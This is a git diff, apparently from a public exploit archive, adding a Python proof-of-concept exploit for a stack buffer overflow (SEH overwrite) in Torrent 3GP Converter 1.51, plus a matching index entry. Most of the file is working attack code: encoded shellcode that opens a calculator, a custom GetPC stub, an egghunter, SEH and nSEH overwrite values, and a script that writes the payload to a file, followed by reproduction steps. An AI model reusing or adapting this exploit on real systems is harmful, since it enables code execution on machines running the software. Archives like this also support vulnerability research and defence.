diff --git a/exploits/windows/local/47965.py b/exploits/windows/local/47965.py new file mode 100755 index 000000000..230b39341 --- /dev/null +++ b/exploits/windows/local/47965.py @@ -0,0 +1,132 @@ +# Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH) +# Exploit Author: boku +# Date: 2020-01-24 +# Software Vendor: torrentrockyou +# Vendor Homepage: http://www.torrentrockyou.com +# Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe +# Version: Torrent 3GP Converter Version 1.51 Build 116 +# Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363 +# Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363 +# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363 +# Recreate: +# 1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86 +# 2) run python script & open created 'crash.txt' file +# 3) select-all > copy-all +# 4) in app, click 'Register' on the bottom +# 5) in 'Name:' textbox enter 'a' +# 6) in 'Code:' textbox paste buffer +# 7) click 'OK', calculator will open & app will crash + +#!/usr/bin/python + +# Bad Chars +# \x00 => \x20 # \x0d Truncates buffer # \x2d Gets ejected from buffer +# \x61-\x6f => \x41-\x4f / ASCII Lower => ASCII Upper +# \x70-\x7a => \x50-\x5a / ASCII Lower => ASCII Upper +# \x9a => \x8a # \x9c => \x8c # \x9e => \x8e +# \xe0-\xef => \xc0-\xcf # \xf0-\xf6 => \xd0-\xd6 +# \xf8-\xfe => \xd8-\xde # \xff => \x9f +# badChars='\x00\x0d\x2d\x61\x62\x63\64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x9a\x9c\x9e\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xee\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' +# Max shellcode size is 2384 bytes +# - First 2384 bytes of our buffer is left unmangled on the stack +# msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode +# x86/alpha_upper chosen with final size 447 +# Payload size: 447 bytes +## msfvenom x86/alpha_uppers GetPC Routine ## +# [!] Does not work because of the bad chars! +# Manually replaced with a working version of GetPC for this exploit +# 89E5 mov ebp, esp +shellcode = b'\x54\x5D' # push esp # pop ebp +# DBCD fcmovne st, st(5) +shellcode += b'\x89\xCF' # mov edi, ecx +# D975 F4 fstenv [ebp-C] +shellcode += b'\x47\x47\x90' # inc edi # inc edi # nop +# 5F pop edi +shellcode += b'\x90' # nop +shellcode += b"\x57\x59\x49" +shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a" +shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" +shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41" +shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42" +shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x55\x50\x55\x50" +shellcode += b"\x33\x30\x43\x50\x4b\x39\x4b\x55\x46\x51\x59" +shellcode += b"\x50\x42\x44\x4c\x4b\x30\x50\x36\x50\x4c\x4b" +shellcode += b"\x56\x32\x34\x4c\x4c\x4b\x56\x32\x42\x34\x4c" +shellcode += b"\x4b\x34\x32\x31\x38\x34\x4f\x4e\x57\x50\x4a" +shellcode += b"\x37\x56\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x35" +shellcode += b"\x31\x43\x4c\x34\x42\x56\x4c\x47\x50\x39\x51" +shellcode += b"\x58\x4f\x34\x4d\x45\x51\x59\x57\x4a\x42\x4a" +shellcode += b"\x52\x46\x32\x56\x37\x4c\x4b\x31\x42\x44\x50" +shellcode += b"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x50\x4c\x42" +shellcode += b"\x31\x33\x48\x4b\x53\x51\x58\x45\x51\x4e\x31" +shellcode += b"\x30\x51\x4c\x4b\x31\x49\x51\x30\x55\x51\x59" +shellcode += b"\x43\x4c\x4b\x30\x49\x42\x38\x4b\x53\x37\x4a" +shellcode += b"\x57\x39\x4c\x4b\x47\x44\x4c\x4b\x53\x31\x59" +shellcode += b"\x46\x46\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f" +shellcode += b"\x34\x4d\x35\x51\x4f\x37\x57\x48\x4d\x30\x53" +shellcode += b"\x45\x4c\x36\x45\x53\x53\x4d\x4a\x58\x37\x4b" +shellcode += b"\x43\x4d\x46\x44\x33\x45\x4a\x44\x56\x38\x4c" +shellcode += b"\x4b\x36\x38\x47\x54\x45\x51\x38\x53\x32\x46" +shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x50\x58\x45" +shellcode += b"\x4c\x53\x31\x59\x43\x4c\x4b\x45\x54\x4c\x4b" +shellcode += b"\x33\x31\x38\x50\x4d\x59\x57\x34\x57\x54\x36" +shellcode += b"\x44\x31\x4b\x51\x4b\x33\x51\x36\x39\x31\x4a" +shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x50" +shellcode += b"\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d\x51\x4d" +shellcode += b"\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x48\x32\x35" +shellcode += b"\x50\x43\x30\x33\x30\x46\x30\x43\x58\x46\x51" +shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f" +shellcode += b"\x4b\x5a\x50\x38\x35\x39\x32\x31\x46\x53\x58" +shellcode += b"\x4e\x46\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58" +shellcode += b"\x55\x47\x4c\x35\x56\x43\x4c\x35\x5a\x4b\x30" +shellcode += b"\x4b\x4b\x4d\x30\x42\x55\x44\x45\x4f\x4b\x37" +shellcode += b"\x37\x45\x43\x54\x32\x32\x4f\x42\x4a\x55\x50" +shellcode += b"\x36\x33\x4b\x4f\x58\x55\x45\x33\x55\x31\x32" +shellcode += b"\x4c\x43\x53\x35\x50\x41\x41" +# Stack EggHunter for fun & profit +egg = 'BOKU' +hunterOS = '\x41'*(2784-len(egg+egg+shellcode)) +# After executing the code in nSEH, we are left with 88 bytes to create our Hunter +hunter = '\x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC +hunter += '\x5B' # pop ebx / EBX=PC +hunter += '\x80\x43\x29\x20' # add byte [ebx+41], 0x20 / 20+55=7F=jnz +hunter += '\x80\x43\x33\x20' # add byte [ebx+51], 0x20 / 20+55=7F=jnz +hunter += '\xB8\x42\x4F\x4B\x55' # mov eax,0x424f4b55 +hunter += '\x54' # push esp +hunter += '\x59' # pop ecx +hunter += '\x90'*18 # nop fillers for jnz short -7 loop +hunter += '\x49' # dec ecx +hunter += '\x3B\x01' # cmp eax, [ecx] +hunter += '\x55\xF7' # 75F7 = jnz short -7 / Have to avoid bad \xF- chars +hunter += '\x51' # push ecx +hunter += '\x5a' # pop edx +hunter += '\x4a'*4 # dec edx * 4 / check if second egg matchs +hunter += '\x3B\x02' # cmp eax, [edx] +hunter += '\x55\xDF' # jnz short -31 / back to the loop - avoid bad chars +hunter += '\x83\xc1\04' # add ecx, 0x4 / start of shellcode after eggs +hunter += '\x31\xd2' # xor edx,edx +hunter += '\x52' # push edx +hunter += '\xC6\x44\x24\x02\x4B' # mov byte [esp+0x2],0x4b +hunter += '\xC6\x44\x24\x01\x44' # mov byte [esp+0x1],0x44 +hunter += '\xC6\x04\x24\x39' # mov byte [esp],0x39 +# [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe] +# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent 3GP Converter\bsvideoconverter.exe) +hunter += '\xc3' # ret +huntRmdr = '\x41'*(88-len(hunter)) +nsehOS = '\x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr)) +nSEH = '\x83\xC4\x04\xC3' # add esp,byte +0x4 # ret +# 3-byte SEH overwrite using the truncating Null byte +SEH = '\x0f\x47\x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe] + # ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE} + +payload = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH + +try: + f=open("crash.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 07d2ea9e7..86655d434 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10919,6 +10919,7 @@ id,file,description,date,author,type,platform,port 47950,exploits/windows/local/47950.txt,"NEOWISE CARBONFTP 1.4 - Weak Password Encryption",2020-01-21,hyp3rlinx,local,windows, 47957,exploits/linux/local/47957.rb,"Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)",2020-01-23,Metasploit,local,linux, 47962,exploits/windows/local/47962.c,"Ricoh Printer Drivers - Local Privilege Escalation",2020-01-22,pentagrid,local,windows, +47965,exploits/windows/local/47965.py,"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)",2020-01-27,boku,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139